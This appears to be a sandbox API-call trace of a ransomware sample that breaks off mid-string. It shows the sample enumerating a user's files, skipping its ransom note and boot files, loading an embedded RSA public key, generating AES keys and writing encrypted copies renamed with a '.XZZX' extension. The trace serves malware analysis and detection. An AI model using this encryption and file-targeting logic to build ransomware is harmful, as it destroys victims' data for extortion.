[0053.257] lstrcpyW (in: lpString1=0x17b644, lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0053.257] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.257] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.257] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0053.257] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.257] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0053.257] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0053.257] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0053.257] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0053.257] FindNextFileW (in: hFindFile=0x3e28638, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0053.257] lstrcmpW (lpString1="9Y_m-oVB2IyYX", lpString2="..") returned 1 [0053.257] lstrcmpW (lpString1="9Y_m-oVB2IyYX", lpString2=".") returned 1 [0053.257] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0053.257] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0053.258] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpString2="9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0053.258] SetErrorMode (uMode=0x1) returned 0x1 [0053.258] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0053.258] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0053.258] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0053.258] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*" [0053.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3e28af8 [0053.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0053.258] lstrcpyW (in: lpString1=0x17a5a4, lpString2="9Y_m-oVB2IyYX" | out: lpString1="9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0053.258] FindNextFileW (in: hFindFile=0x3e28af8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0053.258] FindNextFileW (in: hFindFile=0x3e28af8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0053.258] lstrcmpW (lpString1="2zrMBovJou.wav", lpString2="..") returned 1 [0053.258] lstrcmpW (lpString1="2zrMBovJou.wav", lpString2=".") returned 1 [0053.258] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0053.258] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="ntldr") returned 0x0 [0053.258] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="NTLDR") returned 0x0 [0053.258] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="NTDETECT.COM") returned 0x0 [0053.258] StrStrW (lpFirst="2zrMBovJou.wav", lpSrch="ntdetect.com") returned 0x0 [0053.258] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0053.258] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0053.258] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0053.258] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0053.258] lstrcpyW (in: lpString1=0x17addc, lpString2="2zrMBovJou.wav" | out: lpString1="2zrMBovJou.wav") returned="2zrMBovJou.wav" [0053.258] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0053.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x614 [0053.259] Sleep (dwMilliseconds=0x96) [0053.410] FindNextFileW (in: hFindFile=0x3e28af8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0053.410] lstrcmpW (lpString1="btD83YaGWQR.m4a", lpString2="..") returned 1 [0053.410] lstrcmpW (lpString1="btD83YaGWQR.m4a", lpString2=".") returned 1 [0053.410] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0053.411] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="ntldr") returned 0x0 [0053.411] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="NTLDR") returned 0x0 [0053.411] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0053.411] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="ntdetect.com") returned 0x0 [0053.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0053.411] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0053.411] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0053.411] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0053.411] lstrcpyW (in: lpString1=0x17addc, lpString2="btD83YaGWQR.m4a" | out: lpString1="btD83YaGWQR.m4a") returned="btD83YaGWQR.m4a" [0053.411] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0053.411] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0053.411] Sleep (dwMilliseconds=0x96) [0053.567] FindNextFileW (in: hFindFile=0x3e28af8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0053.568] lstrcmpW (lpString1="BtnyH.mp3", lpString2="..") returned 1 [0053.568] lstrcmpW (lpString1="BtnyH.mp3", lpString2=".") returned 1 [0053.568] StrStrW (lpFirst="BtnyH.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0053.568] StrStrW (lpFirst="BtnyH.mp3", lpSrch="ntldr") returned 0x0 [0053.568] StrStrW (lpFirst="BtnyH.mp3", lpSrch="NTLDR") returned 0x0 [0053.568] StrStrW (lpFirst="BtnyH.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0053.568] StrStrW (lpFirst="BtnyH.mp3", lpSrch="ntdetect.com") returned 0x0 [0053.568] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0053.568] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0053.568] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0053.568] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0053.568] lstrcpyW (in: lpString1=0x17addc, lpString2="BtnyH.mp3" | out: lpString1="BtnyH.mp3") returned="BtnyH.mp3" [0053.568] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0053.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x61c [0053.569] Sleep (dwMilliseconds=0x96) Thread: id = 2 os_tid = 0x9cc Thread: id = 3 os_tid = 0x9d0 Thread: id = 4 os_tid = 0x9d4 Thread: id = 5 os_tid = 0x9d8 Thread: id = 6 os_tid = 0x9dc Thread: id = 7 os_tid = 0x9e0 Thread: id = 8 os_tid = 0x9e8 Thread: id = 9 os_tid = 0x9f0 Thread: id = 10 os_tid = 0x9f4 Thread: id = 11 os_tid = 0x9fc Thread: id = 12 os_tid = 0xa04 Thread: id = 13 os_tid = 0xa08 Thread: id = 14 os_tid = 0xa0c Thread: id = 15 os_tid = 0xa14 Thread: id = 16 os_tid = 0xa18 Thread: id = 18 os_tid = 0xa24 Thread: id = 20 os_tid = 0xa30 Thread: id = 22 os_tid = 0xa4c Thread: id = 24 os_tid = 0xa6c Thread: id = 26 os_tid = 0xa80 Thread: id = 28 os_tid = 0xa9c Thread: id = 30 os_tid = 0xab0 Thread: id = 35 os_tid = 0xaf4 Thread: id = 38 os_tid = 0xb1c Thread: id = 82 os_tid = 0xbf0 [0031.751] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0031.751] lstrcpyW (in: lpString1=0x3f8f460, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0031.751] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0031.751] SetErrorMode (uMode=0x1) returned 0x1 [0031.751] lstrcpyW (in: lpString1=0x3f8f860, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0031.751] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0xdb79e9d9, Data2=0xff72, Data3=0x4594, Data4=([0]=0xbf, [1]=0x39, [2]=0x10, [3]=0x31, [4]=0xb6, [5]=0xf8, [6]=0x6d, [7]=0xda))) returned 0x0 [0031.751] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\bootmgr") returned 14 [0031.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0031.751] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\2C3949A2456D67E8DB79E9D949664C30.XZZX") returned 44 [0031.751] StrStrW (lpFirst="bootmgr", lpSrch="XZZX") returned 0x0 [0031.752] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x20) returned 0 [0031.752] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 83 os_tid = 0xbf4 [0031.899] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0031.899] lstrcpyW (in: lpString1=0x3f8f460, lpString2="BOOTSECT.BAK" | out: lpString1="BOOTSECT.BAK") returned="BOOTSECT.BAK" [0031.899] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0031.899] SetErrorMode (uMode=0x1) returned 0x1 [0031.899] lstrcpyW (in: lpString1=0x3f8f860, lpString2="BOOTSECT.BAK" | out: lpString1="BOOTSECT.BAK") returned="BOOTSECT.BAK" [0031.899] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0xfe379307, Data2=0x943f, Data3=0x4045, Data4=([0]=0xbb, [1]=0xbb, [2]=0xf6, [3]=0x15, [4]=0x70, [5]=0x3a, [6]=0xaa, [7]=0x9d))) returned 0x0 [0031.899] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0031.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0031.899] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\B0AD3AB92537B4FBFE37930729309943.XZZX") returned 44 [0031.899] StrStrW (lpFirst="BOOTSECT.BAK", lpSrch="XZZX") returned 0x0 [0031.899] SetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK", dwFileAttributes=0x20) returned 1 [0031.900] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x304 [0031.900] ReadFile (in: hFile=0x304, lpBuffer=0x3dd7358, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3dd7358*, lpNumberOfBytesRead=0x3f8e418*=0x2000, lpOverlapped=0x0) returned 1 [0031.901] CloseHandle (hObject=0x304) returned 1 [0031.901] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0031.903] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0031.903] SetErrorMode (uMode=0x1) returned 0x1 [0031.903] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0031.903] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ea078) returned 1 [0031.928] CryptGenKey (in: hProv=0x3ea078, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3243f8) returned 1 [0032.167] CryptExportKey (in: hKey=0x3243f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0032.167] CryptExportKey (in: hKey=0x3243f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0032.167] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0032.168] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0032.168] CryptDestroyKey (hKey=0x3243f8) returned 1 [0032.168] CryptReleaseContext (hProv=0x3ea078, dwFlags=0x0) returned 1 [0032.168] CreateFileW (lpFileName="\\\\?\\C:\\B0AD3AB92537B4FBFE37930729309943.XZZX" (normalized: "c:\\b0ad3ab92537b4fbfe37930729309943.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0032.168] WriteFile (in: hFile=0x2f8, lpBuffer=0x3dd7358*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3dd7358*, lpNumberOfBytesWritten=0x3f8e438*=0x2000, lpOverlapped=0x0) returned 1 [0032.169] SetFilePointer (in: hFile=0x2f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2000 [0032.169] WriteFile (in: hFile=0x2f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0032.169] SetFilePointer (in: hFile=0x2f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2005 [0032.169] WriteFile (in: hFile=0x2f8, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x18, lpOverlapped=0x0) returned 1 [0032.170] SetFilePointer (in: hFile=0x2f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x201d [0032.170] WriteFile (in: hFile=0x2f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0032.170] SetFilePointer (in: hFile=0x2f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2022 [0032.170] SetErrorMode (uMode=0x1) returned 0x1 [0032.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- 